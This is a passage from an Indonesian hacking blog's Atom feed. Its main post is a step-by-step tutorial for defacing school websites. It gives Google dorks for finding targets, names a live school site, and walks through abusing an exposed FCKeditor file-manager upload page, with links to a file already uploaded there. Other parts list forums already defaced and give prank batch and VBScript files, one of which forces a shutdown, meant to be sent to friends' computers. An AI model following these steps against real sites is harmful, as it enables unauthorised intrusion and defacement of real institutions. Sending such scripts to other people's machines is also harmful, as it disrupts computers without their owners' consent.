src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgSzno8yH3GtmZaVKgKfzXaBa33X6stKzPURmqjDT5kOpcbpsHxB61QbKsZu_UbQgF45xt9qNnK0eXyhpleQ57ozAatQNNsZkDsymyJPgRV-FGkSu8VZQsaJCl4WUFDpPCPK-UR6RWQZLM/s1600/Video-Iklan-Djarum-76-Terbaru-KONTES-SULAP-JIN.jpg&quot;&amp;gt;&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;
 &amp;lt;font face=&quot;papyrus&quot; color=&quot;green&quot; size=&quot;4&quot;&amp;gt;Thanks To: My Family And My Friend | 
etc&amp;lt;/a&amp;gt;&amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&amp;lt;font color=&quot;red&quot; 
size=&quot;3&quot;&amp;gt;LOL &amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/blockquote&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;br /&gt;&lt;/span&gt;
&lt;/div&gt;
&lt;div class=&quot;post_body&quot; id=&quot;pid_177606&quot; style=&quot;padding-bottom: 5px; padding-left: 5px; padding-right: 5px; padding-top: 5px; text-align: left;&quot;&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;span style=&quot;line-height: 18px;&quot;&gt;Kode diatas bisa diubah sesuai keinginan sobat.&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;line-height: 18px;&quot;&gt; Trus klik tombol post...&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;line-height: 18px;&quot;&gt; Ok, HTML deface&#39;an sobat udah masuk... sekarang klik judul postingan yang sobat tulis di subject tadi.&lt;/span&gt;&lt;/span&gt;&lt;span style=&quot;font-family: inherit; line-height: normal;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;color: white;&quot;&gt;Contoh Website Forum yang di Deface:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style=&quot;line-height: normal; text-align: -webkit-auto;&quot;&gt;
&lt;li style=&quot;text-align: left;&quot;&gt;&lt;a href=&quot;http://www.ecreators.co.uk/csuk_asp_scripts/csuk_forum/messages.asp?iMsg=1565&amp;amp;iFor=18&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;www.ecreators.com&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/li&gt;
&lt;li style=&quot;text-align: left;&quot;&gt;&lt;span style=&quot;background-color: black;&quot;&gt;&lt;a href=&quot;http://www.sailtruenorth.com/forum/messages.asp?iMsg=270&amp;amp;iFor=27&quot;&gt;&lt;span style=&quot;color: blue;&quot;&gt;www.sailtruenorth.com &lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;span style=&quot;background-color: black;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;Sekian, Good Luck !&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/5729009086720550633/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/cara-deface-web.html#comment-form' title='3 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5729009086720550633'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5729009086720550633'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/cara-deface-web.html' title='Cara Deface Web'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>3</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-5553235144327656094</id><published>2012-12-10T21:03:00.002-08:00</published><updated>2013-04-02T21:09:26.410-07:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="hacking"/><title type='text'>Deface Web Sekolah</title><content type='html'>&lt;br /&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;img src=&quot;https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcTiP1o-_kp_KgRGCLckTS9CLYIVcA_GOcyFNJEjm-nfC493gblO&quot; /&gt;

Ok enggak usah bnyk basa-basi, langsung saja menuju ke-TKP :&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
-&amp;nbsp;Step one:&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&amp;nbsp;siapin dulu perlatanya !! file .txt dari notepad (isinya terserah anda 
mau nama pacar nenek ibu kaka terserah) nama sya juga boleh ! hahaha 
udah buat file kan ? yowes lanjutt !&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
- Step two:&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&amp;nbsp;buka google dulu ! terus masukin Dork (kata kunci) nih sya udah siapin Dork tinggal pilih aja :&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
inurl:/html/siswa.php?&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
inurl:/html/alumni.php?&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
inurl:/html/guru.php?&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
setelah ngetik Dork tersebut kan ada banyak web sekolah tuh ? kita tinggal pilih aja&amp;nbsp;&lt;/h3&gt;
&lt;h3&gt;
nih sya ada Live Target : &lt;a href=&quot;http://www.sman1kotabaru.sch.id/&quot; style=&quot;background-color: transparent;&quot;&gt;http://www.sman1kotabaru.sch.id&lt;/a&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&amp;nbsp;- Step Three:&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&amp;nbsp;siapin Exploit dulu , tenang aja sya udah punya exploitnya nih :&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
Exploit: /editor/filemanager/connectors/test.html&amp;nbsp;&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
langsung saja di hajar ! masukin exploit tadi ke url web sch.id&amp;nbsp;ex : &lt;a href=&quot;http://smkn1kuta.sch.id/editor/filemanager/connectors/test.html&quot; rel=&quot;nofollow&quot; style=&quot;color: #3b5998; cursor: pointer; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://smkn1kuta.sch.id/editor/filemanager/connectors/test.html&lt;/a&gt;
 &amp;nbsp;nah, udah muncul kan yang mau di panggang !&amp;nbsp;pada kolom Connector *ASP 
ubah menjadi *PHP terus kolom Resource Type ubah jadi *FILE lalu klik 
Browse (cari file .txt yang kamu buat tadi) &amp;gt; Upload&amp;nbsp;&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
- &amp;nbsp;Step four:&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&amp;nbsp;setelah berhasil di upload , buka aja hasilnya :&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;a href=&quot;http://www.facebook.com/l.php?u=http%3A%2F%2Fsitetarget.sch.id%2Fuserfiles%2FnamafileS0bat.txt&amp;amp;h=TAQH9p_4O&amp;amp;s=1&quot; rel=&quot;nofollow&quot; style=&quot;color: #3b5998; cursor: pointer; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://sitetarget.sch.id/userfiles/namafileS0bat.txt&lt;/a&gt;&amp;nbsp;atau  &lt;a href=&quot;http://sitetarget.sch.id/userfiles/file/namafileS0bat.txt&quot; rel=&quot;nofollow&quot; style=&quot;color: #3b5998; cursor: pointer; text-decoration: none;&quot; target=&quot;_blank&quot;&gt;http://sitetarget.sch.id/userfiles/file/namafileS0bat.txt&lt;/a&gt;&lt;/h3&gt;
&lt;/div&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;h3&gt;
&lt;/h3&gt;
&lt;/div&gt;
&lt;div style=&quot;background-color: white; color: #333333; font-family: &#39;lucida grande&#39;, tahoma, verdana, arial, sans-serif; font-size: 11px; line-height: 16px; padding: 0px; text-align: left; white-space: pre-wrap;&quot;&gt;
&lt;/div&gt;
mudah kan Bro ? &amp;amp; ini contoh-nya&amp;nbsp;: &lt;a href=&quot;http://www.sman1kotabaru.sch.id/userfiles/file/scndrz.txt&quot;&gt;http://www.sman1kotabaru.sch.id/userfiles/file/scndrz.txt&lt;/a&gt;
</content><link rel='replies' type='application/atom+xml' href='http://abrian-pamungkaz.blogspot.com/feeds/5553235144327656094/comments/default' title='Posting Komentar'/><link rel='replies' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/deface-web-sekolah.html#comment-form' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5553235144327656094'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8688056575447479178/posts/default/5553235144327656094'/><link rel='alternate' type='text/html' href='http://abrian-pamungkaz.blogspot.com/2012/12/deface-web-sekolah.html' title='Deface Web Sekolah'/><author><name>Anonymous</name><uri>http://www.blogger.com/profile/10384159654684346439</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='https://img1.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8688056575447479178.post-1007552808435612000</id><published>2012-11-30T09:04:00.002-08:00</published><updated>2013-01-24T05:55:25.796-08:00</updated><category scheme="http://www.blogger.com/atom/ns#" term="tips-trick"/><title type='text'>Code Untuk Isengi Teman</title><content type='html'>&lt;span style=&quot;font-family: inherit;&quot;&gt;&lt;a href=&quot;http://abrian-pamungkaz.blogspot.com/&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange;&quot;&gt;Captain-Kid&lt;/span&gt;&lt;/b&gt;&lt;/a&gt;
 - Malem sob, Kali ini saya akan membahas tentang script code.&amp;nbsp;Saat saya
 lagi menjelajahi forum xcode saya bertemu dengan kode script yang 
keren-keren ini. Saya pikir script ini cocok buat isengin teman-teman 
sobat hehehee...&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;1). Memberi sedikit pesan dan shutdown komputer teman anda.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode:&lt;/span&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;@echo off&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;msg * I don&#39;t like you&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;shutdown -c &quot;Error! You are too stupid!&quot; -s&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As menggunakan Extension .BAT lalu kirim ke teman anda.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: lime; font-family: inherit;&quot;&gt;Contoh: apasaja.bat&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;2). Menyalakan tombol Caps lock secara simultan.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Set wshShell =wscript.CreateObject(&quot;WScript.Shell&quot;)&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;do&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wscript.sleep 100&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;wshshell.sendkeys &quot;{CAPSLOCK}&quot;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;loop&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;- Save As .VBS terus kirim ke teman anda&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;nbsp; &lt;span class=&quot;Apple-style-span&quot; style=&quot;color: lime;&quot;&gt;Contoh: apasaja.VBS&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;line-height: 19px;&quot;&gt;&lt;b&gt;&lt;span class=&quot;Apple-style-span&quot; style=&quot;color: orange; font-family: inherit;&quot;&gt;3). Buka/tutup CD drive secara terus menerus.&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;Ketik kode:&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span class=&quot;Apple-style-span&quot; style=&quot;font-family: inherit; line-height: 19px;&quot;&gt;&lt;br /&gt;
&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0cm; margin-left: 36pt; margin-right: 0cm; margin-top: 0cm;&quot;&gt;
